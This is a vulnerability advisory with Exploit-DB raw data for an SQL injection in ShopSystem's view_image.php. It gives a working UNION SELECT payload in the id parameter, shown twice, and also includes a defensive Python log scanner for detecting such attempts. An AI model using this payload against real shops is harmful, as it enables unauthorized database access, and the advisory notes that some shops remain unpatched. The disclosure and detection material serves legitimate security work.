Vendor: ShopSystem
By: Valentin Hoebel
CVSS: 8.8 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: ShopSystem
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

ShopSystem SQL Injection vulnerability

ShopSystems is a German IT company. They offer webdesign, hosting and training services. One of their most famous products is the software ShopSystem. It is an online shop and allows their customers to offer their products online. Like in other shops it is possible to provide pictures which show the product being offered. By clicking on the image the view gets enlarged (file: view_image.php) and MySQL injection through the ID parameter is possible.

Vulnerable URL:
http://some-cool-domain.tld/shop/view_image.php?id=XX

Exploit vulnerability, e.g. by displaying the current database:
http://some-cool-domain.tld/shop/view_image.php?id=XX+AND+1=2+UNION+SELECT+concat(database()),2,3-

Note: The MySQL output gets displayed within the image URL, so you have to view the source code of the current page in order to retrieve your information.

Mitigation:

Vendor fixed the vulnerability on 06.04.2010, however some shops are still affected.
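
For shops that are still unpatched or were exposed before the fix, one way to review web server access logs for tampering with the id parameter of view_image.php is sketched below. This is an added example, not code from the advisory or the vendor; it assumes combined-format access logs and that legitimate id values are plain integers, and the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Keywords that turn a malformed id into a likely injection attempt.
SQL_HINT_RE = re.compile(r"\b(union|select|concat|database|information_schema)\b", re.I)
NUMERIC_RE = re.compile(r"[0-9]+")

def classify(line):
    """Return (severity, decoded_id) for a suspicious view_image.php request, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("/view_image.php"):
        return None
    # parse_qs decodes '+' and %xx, so encoded payloads are compared in plain form.
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if NUMERIC_RE.fullmatch(value):  # assumption: valid ids are integers
            continue
        severity = "sqli-pattern" if SQL_HINT_RE.search(value) else "non-numeric-id"
        return severity, value
    return None

def scan(lines):
    """Return [(line_number, severity, decoded_id)] for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        result = classify(line)
        if result:
            hits.append((number, *result))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up id 17).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Apr/2010:10:01:02 +0200] "GET /shop/view_image.php?id=17 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [07/Apr/2010:10:03:44 +0200] "GET /shop/view_image.php'
    '?id=17+AND+1=2+UNION+SELECT+concat(database()),2,3- HTTP/1.1" 200 5098',
    '198.51.100.7 - - [07/Apr/2010:10:04:01 +0200] "GET /shop/view_image.php?id=17%27 HTTP/1.1" 200 412',
    '192.0.2.10 - - [07/Apr/2010:10:05:00 +0200] "GET /shop/index.php?id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, severity, value in scan(SAMPLE_LOG):
        print(f"line {number}: {severity}: id={value!r}")
```

The same integer-only rule is what the server side should enforce on id before it reaches the query, alongside a parameterized statement.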

Exploit-DB raw data:

# Exploit Title: ShopSystem SQL Injection vulnerability
# Date: 05.04.2010
# Author: Valentin
# Category: webapps/0day


:: General information
:: ShopSystem SQL Injection vulnerability
:: by Valentin Hoebel
:: valentin@xenuser.org

:: Product information
:: Name = ShopSystem
:: Vendor = ShopSystems
:: Vendor Website = http://www.shopsystems.biz/
:: About the product = http://www.shopsystems.biz/shopsystem/uebersichtshopsystem/mietshop.php
:: Affected versions = Versions unknown


:: SQL Injection vulnerability
ShopSystems is a German IT company. They offer webdesign, hosting and training services. One of their most famous products is the software ShopSystem. It is an online shop and allows their customers to offer their products online.
Like in other shops it is possible to provide pictures which show the product being offered.
By clicking on the image the view gets enlarged (file: view_image.php) and MySQL injection through the ID parameter is possible.

Vulnerable URL
http://some-cool-domain.tld/shop/view_image.php?id=XX

Exploit vulnerability, e.g. by displaying the current database:
http://some-cool-domain.tld/shop/view_image.php?id=XX+AND+1=2+UNION+SELECT+concat(database()),2,3-

Note: The MySQL output gets displayed within the image URL, so you have to view the source code of the current page in order to retrieve your information.


:: Additional information
:: Vendor notified = 05.04.2010
:: Reply received = 05.04.2010
:: Vulnerability fixed = 06.04.2010, some shops are still affected
:: Advisory published = 06.04.2010